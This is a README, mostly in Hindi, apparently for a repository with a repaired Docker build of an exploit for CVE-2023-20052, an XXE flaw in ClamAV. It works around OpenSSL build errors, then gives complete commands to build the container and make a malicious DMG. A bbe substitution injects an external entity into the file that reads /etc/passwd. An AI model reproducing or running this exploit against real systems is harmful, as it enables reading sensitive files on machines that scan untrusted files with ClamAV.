
CVE-2023-20052 ClamAV XXE शोषण के लिए फिक्स्ड Docker बिल्ड। libdmg-hfsplus संगतता के लिए OpenSSL 1.0 के साथ Ubuntu 18.04 का उपयोग करके OpenSSL 3.0 संकलन त्रुटियों का समाधान करता है। XML बाहरी इकाई इंजेक्शन के लिए दुर्भावनापूर्ण DMG फ़ाइलें उत्पन्न करता है।
CVE-2023-20052 (ClamAV XXE भेद्यता) के लिए सुधारित Docker बिल्ड जो वास्तव में कंपाइल होता है।
मूल एक्सप्लॉइट आधुनिक सिस्टम पर बिल्ड नहीं हो पाता:
HMAC_CTX struct अपूर्ण प्रकार त्रुटियाँdmg/filevault.c के कंपाइलेशन पर बिल्ड विफल होता हैlibssl1.0-dev (OpenSSL 1.0) का उपयोग करता हैlibdmg-hfsplus अप्रचलित OpenSSL 1.0 फ़ंक्शंस का उपयोग करता है:
HMAC_CTX_init() / HMAC_CTX_cleanup() (OpenSSL 1.1+ में हटा दिए गए)HMAC_CTX struct उपयोग (OpenSSL 1.1+ में अपारदर्शी)Ubuntu 18.04 OpenSSL 1.0 समर्थन वाला अंतिम LTS है।
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .
# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash
# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus